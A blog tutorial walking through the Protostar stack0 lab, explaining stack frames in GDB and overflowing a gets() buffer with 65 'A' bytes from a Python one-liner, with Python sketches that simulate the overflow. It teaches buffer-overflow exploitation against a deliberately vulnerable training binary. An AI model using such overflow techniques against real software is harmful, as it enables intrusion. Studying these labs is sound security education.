Protostar Stack0 walkthrough

HacksLand | The computer science playground

Posted by Thilan Dissanayaka on Aug 12, 2019

Hello there. In this tutorial we are going to learn Linux exploit development, and we use the Protostar Linux machine for this purpose. Unfortunately the site that originally hosted Protostar is now down, but you can still download the ISO file from the internet; just google it. So first download it and use VirtualBox or VMware as the virtualization software.

Introduction to Protostar

As the first step, boot Protostar and log in as root. The default credentials are "root:godmode". After logging in as root, use ifconfig to get the IP address of the machine.

Now you can use SSH on Linux, or PuTTY, to access our victim machine. This time you have to log in as a normal user. The default credentials are "user:user".

There is one more thing to do before you actually start learning. Just change your shell to bash by entering bash, because the bash shell gives you more power than the sh shell.

Now the interesting part begins. All of the challenges are located inside "/opt/protostar/bin".

So change into that directory and list its contents:

cd /opt/protostar/bin && ls
There are 25 levels to play, which can be divided into the following main categories.
  1. Stack based buffer overflows
  2. Heap based buffer overflows
  3. Format string Exploits

The easiest part to understand is stack based exploits. Even if you are new to exploit development you can understand what's going on. The first level you want to try is stack0. It will teach you how function calls happen, how stack frames are built, how to overflow data beyond an allocated buffer, and so on.

Take a look at the stack0 binary

Let's see what we have to do.

Just enter a string and see what happens.

It tells us to try again. :-(

We are given the source code as well, but it doesn't help a lot by itself. Just try to get an idea of what is happening.

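#include <stdio.h>

int main(int argc, char **argv) {
  volatile int modified;
  char buffer[64];
  modified = 0;
  gets(buffer); /* reads input into buffer with no bounds check */
  if (modified != 0)
    printf("you have changed the 'modified' variable\n");
  else
    printf("Try again?\n");
}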

First it declares two variables called 'modified' and 'buffer'. The size of buffer is 64 bytes. Then it takes a string as input from the user and copies it into the buffer. This code doesn't do any kind of bounds checking before copying data into the buffer; it doesn't care if the supplied string is larger than the buffer. Buffer overflows occur in exactly such situations.

Did you notice something special in the declaration of the 'modified' integer? Why is there a volatile keyword? First we assign zero to 'modified'. The code never changes it afterwards, and yet there is an if-statement that checks whether it is still zero. What a joke. :-) When the compiler sees this, it may decide the check can never succeed and optimize it away. That's why the 'volatile' keyword is used in the code above. It tells the compiler, 'Hey GCC, don't make assumptions about this integer. It may change at run time :-)'

Disassembling the binary

Now it's time to disassemble the binary and see its inner workings. We use GDB for this. Let me introduce you to our awesome tool: GDB stands for GNU Debugger. With a debugger we can see what is happening inside the machine code. In the following screenshot you can see that I have used Intel syntax for the assembly.

set disassembly-flavor intel

The reason to use Intel assembly syntax is that it's clear, user friendly and easy to understand.

As the next step I disassembled the main function. You can see the assembly instructions in the red box. The command I used is:

disass main

There are some hexadecimal values on the left-hand side. Those are memory addresses, and our assembly instructions are stored at these locations. Computer memory is divided into small units called bytes. You know that one byte is equal to 8 bits, and 1 bit can hold zero or one. So 8 bits can hold 256 different values, ranging from 0 to 255 in decimal. On this 32-bit machine we normally work with 4-byte words.

A CPU has 5 main components for processing instructions.
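To make the byte arithmetic concrete, here is a small Python sketch. It counts the values a byte can hold and shows how a 4-byte word is laid out in memory. The word value is just the breakpoint address used later in this tutorial, and the least-significant-byte-first (little-endian) layout is how x86 stores words.

```python
# Values one byte (8 bits) can hold.
BITS_PER_BYTE = 8
values_per_byte = 2 ** BITS_PER_BYTE      # 256 distinct values
max_byte_value = values_per_byte - 1      # so the highest value is 255

# A 4-byte word on 32-bit x86, stored least significant byte first.
word = 0x080483f4                         # example value only
word_bytes = word.to_bytes(4, "little")

print(values_per_byte, max_byte_value)
print(word_bytes.hex())
```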

  1. Data bus
  2. Instruction Decoder
  3. Program counter
  4. Arithmetic and logic unit (ALU)
  5. Registers

The program counter keeps track of which instruction is to be processed next. On x86 this job is done by the EIP register, which always holds the memory address of the next instruction to execute. Since the CPU knows that address, it fetches whatever is found there and hands it to the instruction decoder. The instructions fetched from memory are called opcodes, and each has its own meaning. The opcode for pop edi is 5f, while the opcode for inc ebp is 45. The duty of the instruction decoder is to work out what to do from these opcodes. If it sees opcode 5f, it tells the CPU 'pop the value on top of the stack into EDI'. As the final step, the needed data comes in over the data bus and is processed in the ALU. After that the processed data is saved in memory or in registers. OK, I hope you understood what's going on here.

Actually, instructions like push ebp / mov ebp,esp do not come from the body of the main function. They are added by the compiler to build a stack frame for the function. Let me quickly introduce the term stack.

The stack is a concept used throughout computer science. In programs we use functions to make things easy and clear. In languages like C and Python we supply arguments to functions, and functions return data too. So how is this possible? This is where the stack comes into play. We use the stack to pass function arguments. The stack always begins at a high memory address and grows toward low memory. We can add something to the stack with the push instruction and remove it with the pop instruction. The ESP register always points to the top of the stack.
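The fetch and decode steps can be sketched as a toy in Python. This is only an illustration, not how a real decoder works: the table holds a handful of single-byte 32-bit x86 opcodes, the byte sequence is made up, and the names OPCODES and decode are my own.

```python
# Toy model of fetch/decode. Only a few single-byte 32-bit x86
# opcodes are listed; real instruction decoding is far more involved.
OPCODES = {
    0x55: "push ebp",
    0x5F: "pop edi",
    0x45: "inc ebp",
    0xC3: "ret",
}

def decode(code: bytes, start_address: int) -> list:
    """Walk the bytes the way EIP would, one single-byte opcode at a time."""
    listing = []
    eip = start_address
    for opcode in code:
        listing.append((hex(eip), OPCODES.get(opcode, "unknown")))
        eip += 1  # every opcode in this toy table is one byte long
    return listing

program = bytes([0x55, 0x45, 0x5F, 0xC3])   # hypothetical byte sequence
for address, mnemonic in decode(program, 0x80483f4):
    print(address, mnemonic)
```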
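Push and pop can be modelled in a few lines of Python. This is a minimal sketch, assuming a 32-bit stack with 4-byte slots. The class name Stack32 and the pushed values are made up for illustration, and the starting ESP is the one seen in the GDB session of this tutorial.

```python
class Stack32:
    """Toy 32-bit stack: memory is a dict from address to 4-byte value."""

    def __init__(self, esp: int):
        self.esp = esp
        self.memory = {}

    def push(self, value: int) -> None:
        self.esp -= 4                        # the stack grows toward low addresses
        self.memory[self.esp] = value & 0xFFFFFFFF

    def pop(self) -> int:
        value = self.memory.pop(self.esp)
        self.esp += 4                        # popping moves ESP back up
        return value

stack = Stack32(esp=0xbffff7bc)
stack.push(0x11111111)                       # made-up values
stack.push(0x22222222)
print(hex(stack.esp))
print(hex(stack.pop()), hex(stack.esp))
```

Every push lowers ESP by 4 and every pop raises it by 4, which is exactly the behaviour to watch for in the debugger.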

In the following image I have set a breakpoint inside the main function. For that I used break *0x80483f4. You may ask, 'Why didn't you use break main?' Well, if we use break main, the debugger skips the function prologue and stops at the main function's own code, because it knows the prologue comes from the compiler. Since we want to see how the stack is built, we set the breakpoint like this.

Next, we use the command i r to see what's inside the registers. This is the short form of info registers, and you can use either one. Note that EIP is pointing to the address 0x80483f4. Do you remember it? It was the address of the first instruction of the disassembled code above. EIP contains that value because the next instruction waiting to execute is there; we have stopped execution at the start of the code. The following is a graphical view of the stack. You can see that right now there is something on top of the stack called ret. So what is it? It is the return address: after our function finishes, the CPU has to go to that address and execute whatever instruction it finds there.

We can examine the stack in GDB too. Let's see how. The command for examining memory in hexadecimal is below.

x/x [memory address]

If we want to see the content in decimal we use d, and with t we can see it in binary.

x/d 0xbffff7bc : examine memory in decimal at 0xbffff7bc
x/x 0xbffff7bc : examine memory in hexadecimal at 0xbffff7bc
x/t 0xbffff7bc : examine memory in binary at 0xbffff7bc
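If the three display formats feel abstract, the same idea can be tried in Python. This sketch formats one small example value (0x41, the letter A) in the three bases. The helper name show_formats is my own, and the binary form is padded to 32 bits the way a 4-byte word would be.

```python
def show_formats(value: int) -> dict:
    """Render one 32-bit value in the bases used by x/x, x/d and x/t."""
    return {
        "x": format(value, "#x"),     # hexadecimal
        "d": format(value, "d"),      # decimal
        "t": format(value, "032b"),   # binary, zero-padded to 32 bits
    }

for name, text in show_formats(0x41).items():
    print(name, text)
```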

Get ready for exploitation

What if I want to examine multiple words starting at an address? We can do it this way.

x/10wx 0xbffff7bc : Examine 10 words in hex at 0xbffff7bc

Another thing to note: we can examine memory at the address held in a register directly by using this method.

x/30wx $esp
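To get a feel for what a word dump does with raw bytes, here is a rough Python imitation. It is a sketch only: the function name dump_words and the sample memory are made up, and it assumes little-endian 4-byte words shown four per line.

```python
import struct

def dump_words(memory: bytes, base: int, count: int) -> list:
    """Return lines similar to an x/<count>wx dump of little-endian memory."""
    words = struct.unpack("<%dI" % count, memory[:count * 4])
    lines = []
    for i in range(0, count, 4):                     # four words per line
        row = "\t".join("0x%08x" % w for w in words[i:i + 4])
        lines.append("0x%x:\t%s" % (base + i * 4, row))
    return lines

# Hypothetical memory contents: six words counting up from 1.
sample = b"".join(struct.pack("<I", n) for n in range(1, 7))
for line in dump_words(sample, 0xbffff7bc, 6):
    print(line)
```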

In the image above you can see the return address within a green box at the top of the stack, where ESP points. Remember that the top of the stack is at the low memory addresses.

The next instruction is push ebp. So in theory the value of the EBP register should be copied to the top of the stack after this instruction. Let's see whether this is true.

You can see in the blue box that a value has been copied to the stack, and it's 0xbfff838. This is nothing but the value of EBP. :-) Another thing has happened: ESP changed from 0xbffff7bc to 0xbffff7b8. Calculate the difference in your head and it will be 4. Yes, the size of a register is 4 bytes, so ESP got reduced by 4 bytes. Wait, why was ESP reduced when we pushed data onto the stack? This is because the stack grows toward low memory. If something is pushed onto the stack, ESP is reduced. If we pop something off the stack, ESP goes up. Anyway, right now the stack looks like this.

The next instruction to execute is mov ebp, esp. So the value of ESP should be copied to EBP. Now both the ESP and EBP registers point to the top of the stack like this.

Let's see this situation in GDB.

I have used another GDB command here called ni. It is short for nexti ('next instruction'), and the name says it all: it simply executes the next instruction. In the screenshot above you can also see that ESP has not changed. We have not pushed or popped anything, so ESP stays at its current location.

Next there is the instruction and esp, 0xfffffff0. It aligns the stack to a 16-byte boundary by clearing the low 4 bits of ESP, and we don't need to care much about it. However, ESP changes like this (it goes to a lower address).

The next instruction is sub esp, 0x60, so ESP is reduced by 96 bytes. Where does 96 come from? 0x60 in hex is equal to 96 in decimal. This is how space for local variables is allocated on the stack.

We can see this in GDB too.

0xbffff7b0 - 0xbffff750 = 0x60 ==> 96 Bytes in decimal .
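The whole prologue can be replayed as plain arithmetic. The sketch below starts from the ESP value seen at the breakpoint in this session and applies each instruction in turn. The variable names are mine, and the addresses will differ on another setup.

```python
MASK32 = 0xFFFFFFFF

esp = 0xbffff7bc              # ESP at the breakpoint, pointing at the return address

esp = (esp - 4) & MASK32      # push ebp: ESP drops by 4
after_push = esp
ebp = esp                     # mov ebp, esp: EBP now equals ESP
esp &= 0xfffffff0             # and esp, 0xfffffff0: round down to a multiple of 16
after_align = esp
esp = (esp - 0x60) & MASK32   # sub esp, 0x60: reserve 96 bytes for locals
after_sub = esp

print(hex(after_push), hex(after_align), hex(after_sub))
print(after_align - after_sub)
```

The last line prints the size of the reserved area, which matches the subtraction done by hand above.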

OK. Let's see what's next.

mov DWORD PTR [esp + 0x5c] , 0x0

This instruction takes the address esp + 0x5c and writes a zero to it. Since 0x5c is equal to 92 in decimal, the zero lands in the last 4 bytes of the 96 bytes we just reserved. Can you guess what this line actually does? In our C source code there was an int variable set to zero. This is that variable. :-)

The next instruction is:

lea eax , [esp + 0x1c]

lea stands for Load Effective Address. This loads the address esp + 0x1c (esp + 28) into EAX.

After that, whatever is in EAX is placed on top of the stack. What did these two instructions do together? They put an address on the stack. But why? It is the argument for the next function: the next thing to do is call the gets function, and the argument to that function is passed on the stack. Once called, gets writes the input data to that memory address.

Let's see what happens when gets writes the input data to the buffer on the stack. Now I enter some As as the input string.

You can clearly see that our input is copied onto the stack.

What if I enter a larger number of As? They will overflow into our earlier value (the modified integer). How much data is needed to overflow into the integer? The buffer starts at esp + 0x1c and modified sits at esp + 0x5c, which is 0x40 = 64 bytes later, right after the 64-byte buffer. So if I enter 65 As, modified will get changed.
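The overflow can be simulated without touching the real binary. This Python sketch models the 96-byte frame as a bytearray, using the two offsets from the disassembly (0x1c for the buffer and 0x5c for modified), and copies the input in the way gets does, including the zero byte it appends. The function name modified_after_input is my own.

```python
import struct

FRAME_SIZE = 0x60        # bytes reserved by sub esp, 0x60
BUFFER_OFFSET = 0x1c     # from lea eax, [esp + 0x1c]
MODIFIED_OFFSET = 0x5c   # from mov DWORD PTR [esp + 0x5c], 0x0

def modified_after_input(data: bytes) -> int:
    """Simulate gets() writing data plus a NUL byte into the frame."""
    frame = bytearray(FRAME_SIZE)                   # modified starts at 0
    written = data + b"\x00"                        # gets() appends a terminator
    end = min(BUFFER_OFFSET + len(written), FRAME_SIZE)  # stay inside the toy frame
    frame[BUFFER_OFFSET:end] = written[:end - BUFFER_OFFSET]
    return struct.unpack_from("<I", frame, MODIFIED_OFFSET)[0]

print(MODIFIED_OFFSET - BUFFER_OFFSET)              # distance from buffer to modified
print(modified_after_input(b"A" * 64))
print(hex(modified_after_input(b"A" * 65)))
```

With 64 As only the terminating zero byte reaches modified, so it stays 0. The 65th A is the first byte that actually changes it.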

Now everything is clear. It's time for exploitation. We can use lovely <3 Python for this.

If I enter python -c "print '\x41' * 65" in a shell, I get 65 As printed. So I can pipe this command's output into the stack0 program as its input.

Awesome, we did it. We successfully modified the value. It was not just one command; we learned all the theory behind it.

Now there is one more thing. What if I enter an even larger input?

We got a segmentation fault. The real fun begins here. We are going to learn more about this topic in future tutorials.

See you again soon. Thanks for reading.
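The one-liner above uses Python 2 print syntax. If you prefer to build the input with Python 3, a minimal sketch could look like this. The function name build_payload and the constant are my own, and the trailing newline is there because gets stops reading at a newline.

```python
BUFFER_SIZE = 64   # size of buffer in the C source

def build_payload(extra: int = 1) -> bytes:
    """Fill the buffer with 'A' bytes, then add extra bytes to reach modified."""
    return b"\x41" * (BUFFER_SIZE + extra) + b"\n"   # newline ends the gets() read

payload = build_payload()
print(len(payload) - 1)      # number of As, not counting the newline
print(payload[:8])
```

The resulting bytes can be written to a file or to standard output and fed to the program in the same way as the output of the one-liner.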
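Why does a bigger input crash the program? A little arithmetic on the addresses from this GDB session gives a hint. This is a sketch under the assumption that the layout is exactly as seen in the screenshots; the addresses will be different in another environment, and the variable names are mine.

```python
esp_after_prologue = 0xbffff750              # ESP after sub esp, 0x60
buffer_address = esp_after_prologue + 0x1c   # from lea eax, [esp + 0x1c]
return_address_slot = 0xbffff7bc             # ESP at the first breakpoint
saved_ebp_address = return_address_slot - 4  # push ebp stored the old EBP just below it

bytes_to_saved_ebp = saved_ebp_address - buffer_address
bytes_to_return_address = return_address_slot - buffer_address

print(hex(buffer_address))
print(bytes_to_saved_ebp, bytes_to_return_address)
```

So once the input grows past these distances it starts overwriting the saved EBP and the return address, and the CPU ends up trying to jump to an address made of our As.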

Hi, I'm Thilan. An engineering student from Sri Lanka. I love to code with Python, JavaScript, PHP and C.
